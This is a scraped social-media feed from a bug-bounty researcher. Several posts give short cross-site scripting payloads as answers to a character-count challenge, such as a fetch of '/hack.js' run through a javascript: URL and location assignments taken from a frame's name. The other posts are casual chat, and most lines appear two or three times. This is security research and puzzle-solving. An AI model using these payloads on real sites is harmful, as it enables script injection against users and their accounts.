Tom Anthony
@tomanthony.bsky.social
Web dev since 1998. Bug bounty & security enthusiast. PhD in AI. CTO at SearchPilot - data driven SEO.
https://www.tomanthony.co.uk
https://www.tomanthony.co.uk
I think with the race condition 11 is possible with: open(top.x)?
December 13, 2024 at 3:50 PM
I think with the race condition 11 is possible with: open(top.x)?
This is 13 without the race condition, using your cool build up method @terjanq.me:
www.tomanthony.co.uk/temp/joax1.h...
www.tomanthony.co.uk/temp/joax1.h...
www.tomanthony.co.uk
December 13, 2024 at 3:49 PM
This is 13 without the race condition, using your cool build up method @terjanq.me:
www.tomanthony.co.uk/temp/joax1.h...
www.tomanthony.co.uk/temp/joax1.h...
Within the rules of no framing / no window context, I think we can get down to 64 with:
fetch`/hack.js`.then(r=>r.text()).then(b=>open('javascript:'+b))
fetch`/hack.js`.then(r=>r.text()).then(b=>open('javascript:'+b))
December 13, 2024 at 3:29 PM
Within the rules of no framing / no window context, I think we can get down to 64 with:
fetch`/hack.js`.then(r=>r.text()).then(b=>open('javascript:'+b))
fetch`/hack.js`.then(r=>r.text()).then(b=>open('javascript:'+b))
Or if you are 'cheating' and using the run() function on the page then you can do 16:
run(top[0].name)
run(top[0].name)
December 12, 2024 at 6:51 PM
Or if you are 'cheating' and using the run() function on the page then you can do 16:
run(top[0].name)
run(top[0].name)
If the real case was truly frameable, then you iframe another page on joaxcar.com, and then iframe this one with this 20 character payload:
location=top[0].name
If it isn't frameable, you can do 23 chars:
location=opener[0].name
location=top[0].name
If it isn't frameable, you can do 23 chars:
location=opener[0].name
December 12, 2024 at 6:42 PM
If the real case was truly frameable, then you iframe another page on joaxcar.com, and then iframe this one with this 20 character payload:
location=top[0].name
If it isn't frameable, you can do 23 chars:
location=opener[0].name
location=top[0].name
If it isn't frameable, you can do 23 chars:
location=opener[0].name
I feel the same. I feel like years of Twitter made me much more cautious about what I shared. Trying to get out of that mindset now.
November 24, 2024 at 8:27 AM
I feel the same. I feel like years of Twitter made me much more cautious about what I shared. Trying to get out of that mindset now.
I'm not sure that it is! But don't know for sure. I'll see if I can crack it this evening, but otherwise I'll ping your way. (Though you need to follow me so I can DM)
November 22, 2024 at 12:48 PM
I'm not sure that it is! But don't know for sure. I'll see if I can crack it this evening, but otherwise I'll ping your way. (Though you need to follow me so I can DM)
Making lunch and already found one case partially working in the wild on a big target. Ping me a DM on X (@tomanthonyseo) if you want to collab on it! :)
November 22, 2024 at 12:18 PM
Making lunch and already found one case partially working in the wild on a big target. Ping me a DM on X (@tomanthonyseo) if you want to collab on it! :)
This is incredible research!
November 22, 2024 at 10:48 AM
This is incredible research!
This is basically identical to how I hack! Look for the new thing and then see something that looks interesting. Hopefully get far enough that I have a ‘lead’ and take it from there.
November 20, 2024 at 11:16 AM
This is basically identical to how I hack! Look for the new thing and then see something that looks interesting. Hopefully get far enough that I have a ‘lead’ and take it from there.